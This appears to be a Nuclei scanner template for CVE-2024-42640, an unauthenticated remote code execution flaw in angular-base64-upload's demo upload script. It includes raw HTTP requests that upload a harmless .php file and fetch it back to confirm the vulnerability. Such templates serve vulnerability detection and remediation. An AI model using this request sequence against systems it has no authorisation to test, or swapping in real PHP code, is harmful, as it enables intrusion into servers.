id: CVE-2024-42640

info:
  name: Angular-Base64-Upload - Remote Code Execution
  author: s4e-io
  severity: critical
  description: |
    angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
  impact: |
    Unauthenticated attackers can upload arbitrary files and achieve remote code execution on the server.
  remediation: |
    Upgrade angular-base64-upload to version 0.1.21 or discontinue use as the product is no longer supported.
  reference:
    - https://github.com/rvizx/CVE-2024-42640
    - https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html
    - https://github.com/adonespitogo/angular-base64-upload
    - https://nvd.nist.gov/vuln/detail/CVE-2024-42640
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
    cvss-score: 10
    cve-id: CVE-2024-42640
    cwe-id: CWE-94
    epss-score: 0.43683
    epss-percentile: 0.98572
  metadata:
    max-request: 4
  tags: cve,cve2024,angular,rce,vkev,vuln

variables:
  filename: "{{to_lower(rand_text_alpha(12))}}"
  num: "{{rand_int(1000000,9999999)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /node_modules/angular-base64-upload/demo/server.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}

      - |
        POST /bower_components/angular-base64-upload/demo/server.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1,"uploads/{{filename}}.php") || contains(body_2,"uploads/{{filename}}.php") '
          - 'status_code_1 == 200 || status_code_2 == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /node_modules/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /bower_components/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_3, "{{num}}") || contains(body_4, "{{num}}")'
          - 'status_code_3 == 200 || status_code_4 == 200'
        condition: and
# digest: 4a0a00473045022100877d2ec6cf623229910ab6dcc333338137387e3231a2770c0d5de17ef9e1e68e02205e90eb575f66d5da1501fde31f5de8ee20525f4381da030f1c6928cc742b3af8:922c64590222798bb761d5b6d8e72950